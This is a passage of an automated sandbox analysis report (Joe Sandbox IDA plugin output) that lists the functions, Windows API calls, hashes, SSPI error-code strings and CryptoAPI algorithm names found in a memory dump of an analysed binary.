Instruction Fuzzy Hash: 2BD24B34A04301DFDB65CF6CC584AA83BA2AB46350F1891B7ED0A8F75AD730DA44DB76

Function 0010F820 Relevance: 3.0, APIs: 2, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,?,?,?,0010F8CD,?,00000000,?,00000000,?,?,00109C33), ref: 0010F834
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?,?,0010F8CD,?,00000000,?,00000000,?,?,00109C33,?), ref: 0010F84B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Crypt$AcquireContextCreateHash
String ID:
API String ID: 1914063823-0
Opcode ID: acd556c885e8d3b25b3d9b8d0e5f1c5c2f7e69dcefaeb12b55f08371248af13f
Instruction ID: b1c76fd72ad1175ad32619bef701b654b57b58d32bd7ec46209cae72a774779f
Opcode Fuzzy Hash: acd556c885e8d3b25b3d9b8d0e5f1c5c2f7e69dcefaeb12b55f08371248af13f
Instruction Fuzzy Hash: D3E0EC36240694FBE7305AA7DD0DED77FADEBC6F50B008029FA48D6450DA61E501C7B5

Function 0011137A Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00111390

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 21e3329fc2ddbc790fd65fc6764ed7e9e6469002613c8f44689f857e223c73bd
Instruction ID: adf4102bd331222b97b984e60443d736fb491ab2c1a1264a40e308a69191e2cb
Opcode Fuzzy Hash: 21e3329fc2ddbc790fd65fc6764ed7e9e6469002613c8f44689f857e223c73bd
Instruction Fuzzy Hash: 59518BB1A00615EBEB28CF99D8817EABBF1FB48710F14803ED505EBA51D3749992CF60

Function 0010C730 Relevance: 1.5, APIs: 1, Instructions: 10encryptionCOMMON

Download Yara Rule

APIs

CryptHashData.ADVAPI32(?,00000000,00109C33,00000000,?,0010F8E1,?,?,00109C33,00000000,?,00000000,?,?,00109C33,?), ref: 0010C741

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CryptDataHash
String ID:
API String ID: 4245837645-0
Opcode ID: 95ad49e7498e0c8d6b4346cd9445f7e7906e1745ff353b86b67be2a06de00b0d
Instruction ID: e93cef2a4426548044e5f41497229ecb9e63d309b932355ada606d57eb302f02
Opcode Fuzzy Hash: 95ad49e7498e0c8d6b4346cd9445f7e7906e1745ff353b86b67be2a06de00b0d
Instruction Fuzzy Hash: 7FC00236140208EBCF015F84DD05ED97BAABB48751F048050BA1C4A561C772E5609B84

Function 001116BE Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000516D0,001111D5), ref: 001116C3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 10979a85b1cf626d1ae3fc0ab1b3f0d24437bc657cedefb78ec798f7133d0aa5
Instruction ID: 343affbba503889ad9ce81823a34b38062bbe564c62bdfaf341cfbef50fb6e07
Opcode Fuzzy Hash: 10979a85b1cf626d1ae3fc0ab1b3f0d24437bc657cedefb78ec798f7133d0aa5
Instruction Fuzzy Hash:

Function 001133B0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e40239da6b8865e1b1a6b07afad88b35b9aad3ac8e7bdaf823b8a14d2e7c0974
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 8E11087730009243D60ECA2DD4B45FAE795EBC532072D427AD0B28BE5CD722EBC59905

Function 000DA216 Relevance: 159.5, APIs: 7, Strings: 84, Instructions: 271stringCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000), ref: 000DA230
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA238
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 000DA62C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA63C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA64C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA654
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA65F

Strings

SEC_E_SECPKG_NOT_FOUND, xrefs: 000DA47F
SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 000DA3E9
SEC_E_TIME_SKEW, xrefs: 000DA4CF
SEC_E_TOO_MANY_PRINCIPALS, xrefs: 000DA4D9
SEC_E_CERT_WRONG_USAGE, xrefs: 000DA2C7
SEC_E_TARGET_UNKNOWN, xrefs: 000DA4C5
SEC_E_KDC_UNABLE_TO_REFER, xrefs: 000DA399
SEC_E_CERT_EXPIRED, xrefs: 000DA2B3
SEC_E_NO_TGT_REPLY, xrefs: 000DA42F
SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 000DA367
SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 000DA3B7
SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 000DA475
SEC_I_CONTEXT_EXPIRED, xrefs: 000DA57E
SEC_E_CANNOT_INSTALL, xrefs: 000DA29F
SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 000DA2E5
SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 000DA321
SEC_E_BAD_PKGID, xrefs: 000DA28B
SEC_E_INCOMPLETE_MESSAGE, xrefs: 000DA32B
SEC_E_MUST_BE_KDC, xrefs: 000DA3D5
SEC_E_NO_IMPERSONATION, xrefs: 000DA3FD
SEC_E_DELEGATION_POLICY, xrefs: 000DA2F9
SEC_E_UNSUPPORTED_FUNCTION, xrefs: 000DA4F7
SEC_E_BUFFER_TOO_SMALL, xrefs: 000DA295
SEC_E_UNTRUSTED_ROOT, xrefs: 000DA50B
SEC_I_RENEGOTIATE, xrefs: 000DA5CB, 000DA5D8
SEC_I_COMPLETE_NEEDED, xrefs: 000DA569
SEC_E_DECRYPT_FAILURE, xrefs: 000DA2EF
SEC_I_NO_LSA_CONTEXT, xrefs: 000DA5C4
No error, xrefs: 000DA577
SEC_E_OUT_OF_SEQUENCE, xrefs: 000DA439
%s (0x%08X), xrefs: 000DA5D9
SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 000DA493
%s - %s, xrefs: 000DA60D
SEC_E_MESSAGE_ALTERED, xrefs: 000DA3C1
CRYPT_E_REVOKED, xrefs: 000DA529
SEC_E_CANNOT_PACK, xrefs: 000DA2A9
SEC_E_NO_CREDENTIALS, xrefs: 000DA3F3
SEC_E_INTERNAL_ERROR, xrefs: 000DA33F
SEC_E_BAD_BINDINGS, xrefs: 000DA281
SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 000DA425
SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 000DA4B1
SEC_E_REVOCATION_OFFLINE_C, xrefs: 000DA46B
SEC_E_PKINIT_NAME_MISMATCH, xrefs: 000DA44D
SEC_E_KDC_CERT_REVOKED, xrefs: 000DA385
SEC_E_MULTIPLE_ACCOUNTS, xrefs: 000DA3CB
SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 000DA2DB
SEC_E_INSUFFICIENT_MEMORY, xrefs: 000DA335
SEC_E_UNSUPPORTED_PREAUTH, xrefs: 000DA501
SEC_I_SIGNATURE_NEEDED, xrefs: 000DA5BD
SEC_E_WRONG_PRINCIPAL, xrefs: 000DA51F
SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 000DA49D
SEC_E_CONTEXT_EXPIRED, xrefs: 000DA2D1
SEC_E_NO_IP_ADDRESSES, xrefs: 000DA407
SEC_E_ALGORITHM_MISMATCH, xrefs: 000DA277
SEC_E_DOWNGRADE_DETECTED, xrefs: 000DA30D
SEC_E_KDC_CERT_EXPIRED, xrefs: 000DA37B
SEC_E_KDC_INVALID_REQUEST, xrefs: 000DA38F
SEC_E_SECURITY_QOS_FAILED, xrefs: 000DA489
SEC_E_DELEGATION_REQUIRED, xrefs: 000DA303
SEC_E_CERT_UNKNOWN, xrefs: 000DA2BD
SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 000DA4A7
SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 000DA5A8
SEC_E_ENCRYPT_FAILURE, xrefs: 000DA317
SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 000DA371
SEC_E_INVALID_HANDLE, xrefs: 000DA349
SEC_E_UNKNOWN_CREDENTIALS, xrefs: 000DA4ED
SEC_E_POLICY_NLTM_ONLY, xrefs: 000DA457
SEC_E_NOT_OWNER, xrefs: 000DA3DF
SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 000DA4E3
SEC_E_INVALID_PARAMETER, xrefs: 000DA353
SEC_E_INVALID_TOKEN, xrefs: 000DA35D
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 000DA4BB
SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 000DA5D2
SEC_E_LOGON_DENIED, xrefs: 000DA3AD
SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 000DA443
SEC_E_QOP_NOT_SUPPORTED, xrefs: 000DA461
SEC_E_NO_PA_DATA, xrefs: 000DA41B
SEC_I_LOCAL_LOGON, xrefs: 000DA55B
Unknown error, xrefs: 000DA59E
SEC_I_CONTINUE_NEEDED, xrefs: 000DA570
SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 000DA3A3
SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 000DA515
SEC_E_NO_KERB_KEY, xrefs: 000DA411
SEC_I_COMPLETE_AND_CONTINUE, xrefs: 000DA562

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
API String ID: 4135170618-3170461277
Opcode ID: 6927d9fe3d7bc3081a07503ab337080c7357398a00d2f04ef165e90cd8ef4549
Instruction ID: e70158165c38730c8a7deb9d8bfbfb2af028439b31d4b0a1fe3774a1ec956328
Opcode Fuzzy Hash: 6927d9fe3d7bc3081a07503ab337080c7357398a00d2f04ef165e90cd8ef4549
Instruction Fuzzy Hash: BD81F021708BAAD78B34475C7B049BD6554E713308B604123B622EFB48DB29CEA6F777

Function 000C245C Relevance: 95.3, APIs: 76, Instructions: 282COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2464
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2472
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C247E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C248A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2496

Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C3167), ref: 000D0E2C
Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E41

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24AA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24BE
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24CA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24D9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24EB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24FD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C250F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2521
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2533
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2545
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2557
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C256C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C257E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2590
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25A2
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25B4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25C6
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25D8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25EA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25FC
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C260E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2620
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C263D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C264F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2661
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C267F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C268C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2699
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C26A4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C26D1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C26E3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C26F5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2707
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2719
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C272B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C273D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C274F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2761
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2773
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2785
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2797
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27A9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27BB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27CD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27DF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27F4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2806
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2818
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C282A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C283C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C284E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2860
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2872
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2884
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2896
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28A8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28BA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28CC
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28DE
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28F0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2902
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2917
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2929
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C293B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C294A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C29D9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C29EB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C29FD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2A0F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2A21
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2A33

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b517ebb787abe049bfd3f96fd098097e5b95780a53a2ed52637dae8ce26aec47
Instruction ID: 3641be66e3916f868a947a0871b255359d3282e2a57b7d728116115d0842b046
Opcode Fuzzy Hash: b517ebb787abe049bfd3f96fd098097e5b95780a53a2ed52637dae8ce26aec47
Instruction Fuzzy Hash: 19F10D76602E12EFDB8A5FA0D948AC9FB72BF48701F008206F92957621CB3525B1DFD5

Function 00103B1A Relevance: 92.8, APIs: 4, Strings: 49, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000000,?,0000001F), ref: 00103B39
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,USE_STRONG_CRYPTO,00000011,0000001F), ref: 00103B59
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,SCH_USE_STRONG_CRYPTO,00000015,?,?,?,0000001F), ref: 00103B6E
___from_strstr_to_strchr.LIBCMT ref: 00103B8E

Part of subcall function 00103B1A: ___from_strstr_to_strchr.LIBCMT ref: 0010345C
Part of subcall function 00103B1A: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 0010349C

Strings

CALG_AES_256, xrefs: 001039DB
CALG_HMAC, xrefs: 0010392C
CALG_SCHANNEL_MASTER_HASH, xrefs: 0010383A
CALG_DH_SF, xrefs: 00103700
CALG_SHA_512, xrefs: 00103A64
CALG_DSS_SIGN, xrefs: 001035A5
CALG_3DES, xrefs: 00103651
SCH_USE_STRONG_CRYPTO, xrefs: 00103B68
CALG_RSA_KEYX, xrefs: 001035EA
CALG_RSA_SIGN, xrefs: 00103582
CALG_SCHANNEL_MAC_KEY, xrefs: 0010385D
CALG_DESX, xrefs: 00103674
CALG_MAC, xrefs: 0010355E
CALG_DH_EPHEM, xrefs: 00103723
CALG_PCT1_MASTER, xrefs: 001038A3
CALG_RC4, xrefs: 001036BA
CALG_SSL2_MASTER, xrefs: 001038C5
CALG_SEAL, xrefs: 001036DD
CALG_SSL3_MASTER, xrefs: 00103818
CALG_CYLINK_MEK, xrefs: 001037D0
CALG_ECDSA, xrefs: 00103ACC
CALG_SHA_256, xrefs: 00103A20
CALG_AES_192, xrefs: 001039B9
CALG_SHA_384, xrefs: 00103A42
CALG_MD4, xrefs: 001034E3
CALG_ECDH, xrefs: 00103A86
USE_STRONG_CRYPTO, xrefs: 00103B53
CALG_MD2, xrefs: 001034BB
CALG_3DES_112, xrefs: 0010362F
CALG_RC2, xrefs: 00103697
CALG_HUGHES_MD5, xrefs: 00103768
CALG_TLS1PRF, xrefs: 00103951
CALG_AES_128, xrefs: 00103997
CALG_SKIPJACK, xrefs: 0010378B
CALG_ECMQV, xrefs: 00103AA9
CALG_MD5, xrefs: 00103502
CALG_DES, xrefs: 0010360C
CALG_TLS1_MASTER, xrefs: 001038E7
CALG_NO_SIGN, xrefs: 001035C7
CALG_TEK, xrefs: 001037AD
CALG_ECDH_EPHEM, xrefs: 00103AEF
CALG_RC5, xrefs: 00103909
CALG_AGREEDKEY_ANY, xrefs: 00103745
CALG_HASH_REPLACE_OWF, xrefs: 00103974
CALG_SCHANNEL_ENC_KEY, xrefs: 00103880
CALG_SHA, xrefs: 00103521
CALG_SSL3_SHAMD5, xrefs: 001037F5
CALG_AES, xrefs: 001039FD
CALG_SHA1, xrefs: 0010353B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchrstrncmp$strncpystrtol
